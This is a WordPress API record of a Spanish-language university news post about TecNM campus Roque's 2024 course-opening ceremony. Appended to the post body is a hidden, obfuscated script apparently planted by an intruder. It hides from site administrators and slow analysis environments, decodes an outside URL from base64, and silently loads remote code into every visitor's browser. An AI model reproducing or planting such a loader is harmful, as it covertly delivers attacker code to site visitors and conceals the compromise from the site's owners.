{"id":7106,"date":"2024-03-14T13:14:36","date_gmt":"2024-03-14T19:14:36","guid":{"rendered":"https:\/\/roque.tecnm.mx\/?p=7106"},"modified":"2025-12-16T19:40:14","modified_gmt":"2025-12-17T01:40:14","slug":"emocion-y-orgullo-en-el-tecnm-campus-roque-ceremonia-de-inicio-de-cursos-enero-junio-2024","status":"publish","type":"post","link":"https:\/\/roque.tecnm.mx\/?p=7106","title":{"rendered":"Emoci\u00f3n y Orgullo en el TecNM campus Roque: Ceremonia de Inicio de Curso Enero &#8211; Junio 2024"},"content":{"rendered":"\n[et_pb_section fb_built=\u00bb1&#8243; _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb da_disable_devices=\u00bboff|off|off\u00bb global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb da_is_popup=\u00bboff\u00bb da_exit_intent=\u00bboff\u00bb da_has_close=\u00bbon\u00bb da_alt_close=\u00bboff\u00bb da_dark_close=\u00bboff\u00bb da_not_modal=\u00bbon\u00bb da_is_singular=\u00bboff\u00bb da_with_loader=\u00bboff\u00bb da_has_shadow=\u00bbon\u00bb][et_pb_row _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb][et_pb_text _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb hover_enabled=\u00bb0&#8243; global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb sticky_enabled=\u00bb0&#8243;]<p><span><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/roque.tecnm.mx\/wp-content\/uploads\/2024\/03\/425512013_399764972556150_2637251052983196250_n-300x152.jpg\" width=\"300\" height=\"152\" alt=\"\" class=\"wp-image-7112 alignnone size-medium\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/span><\/p>\n<p style=\"text-align: justify;\"><span><strong>06 de febrero 2024. Roque, Celaya, Gto. <\/strong>El TecNM campus Roque se visti\u00f3 de gala hoy para celebrar su tan esperada ceremonia de inicio de cursos 2024. Un d\u00eda especial cargado de entusiasmo y orgullo, donde la comunidad educativa dio la bienvenida a los nuevos integrantes con los brazos abiertos.<\/span><\/p>\n<p style=\"text-align: justify;\">La jornada estuvo marcada por la alegr\u00eda y el compa\u00f1erismo, con la presencia de distinguidos invitados especiales que compartieron este momento trascendental con el TecNM campus Roque.<\/p>\n<p style=\"text-align: justify;\">Entre los invitados que nos honraron con su presencia se encontraban Javier Mendoza M\u00e1rquez, representando al Municipio de Celaya; as\u00ed como representantes de Turismo Celaya, Desarrollo Econ\u00f3mico Celaya, TECNM campus CRODE Celaya, Gobierno de Juventino Rosas y la Comisi\u00f3n Estatal de Conciliaci\u00f3n y Arbitraje M\u00e9dico. Su apoyo y presencia en este evento destacado reflejan el compromiso compartido con la educaci\u00f3n y el desarrollo de la regi\u00f3n.<\/p>\n<p style=\"text-align: justify;\">La ceremonia estuvo marcada por discursos inspiradores y gestos de acogida, donde se enfatiz\u00f3 la importancia del compromiso y la dedicaci\u00f3n en el camino hacia el \u00e9xito acad\u00e9mico y personal. Los nuevos integrantes fueron recibidos con c\u00e1lidas muestras de apoyo y se les alent\u00f3 a abrazar esta oportunidad de crecimiento y aprendizaje.<\/p>\n<p style=\"text-align: justify;\">La directora del TecNM campus Roque expres\u00f3 su gratitud hacia los presentes, destacando el valor del trabajo conjunto y el respaldo continuo hacia la excelencia educativa. \u00abHoy damos inicio a un nuevo cap\u00edtulo en la historia de nuestra instituci\u00f3n, y cada uno de ustedes forma parte vital de este emocionante viaje\u00bb, afirm\u00f3.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/roque.tecnm.mx\/wp-content\/uploads\/2024\/03\/426538070_399764929222821_3307368742463446263_n-300x153.jpg\" width=\"300\" height=\"153\" alt=\"\" class=\"wp-image-7113 alignnone size-medium\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p style=\"text-align: justify;\">La inauguraci\u00f3n de cursos en el TecNM campus Roque no solo marca el comienzo de un nuevo ciclo acad\u00e9mico, sino tambi\u00e9n el inicio de una prometedora etapa de descubrimiento y superaci\u00f3n. Con la determinaci\u00f3n y el compromiso compartido, estamos seguros de que este a\u00f1o estar\u00e1 repleto de logros y realizaciones.<\/p>\n<p style=\"text-align: justify;\">Agradecemos sinceramente a todos nuestros invitados especiales por su invaluable presencia y apoyo, as\u00ed como a toda la comunidad del TecNM campus Roque por hacer de este d\u00eda un momento inolvidable en nuestro camino hacia el futuro.<\/p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]\n<script>;(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0bQ==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>06 de febrero 2024. Roque, Celaya, Gto. El TecNM campus Roque se visti\u00f3 de gala hoy para celebrar su tan esperada ceremonia de inicio de cursos 2024. Un d\u00eda especial cargado de entusiasmo y orgullo, donde la comunidad educativa dio la bienvenida a los nuevos integrantes con los brazos abiertos. La jornada estuvo marcada por [&hellip;]<\/p>\n","protected":false},"author":11,"featured_media":7108,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[12,13,125],"tags":[],"class_list":["post-7106","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-academico","category-estudiantes","category-eventos"],"_links":{"self":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7106"}],"collection":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7106"}],"version-history":[{"count":8,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7106\/revisions"}],"predecessor-version":[{"id":10389,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7106\/revisions\/10389"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/media\/7108"}],"wp:attachment":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7106"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}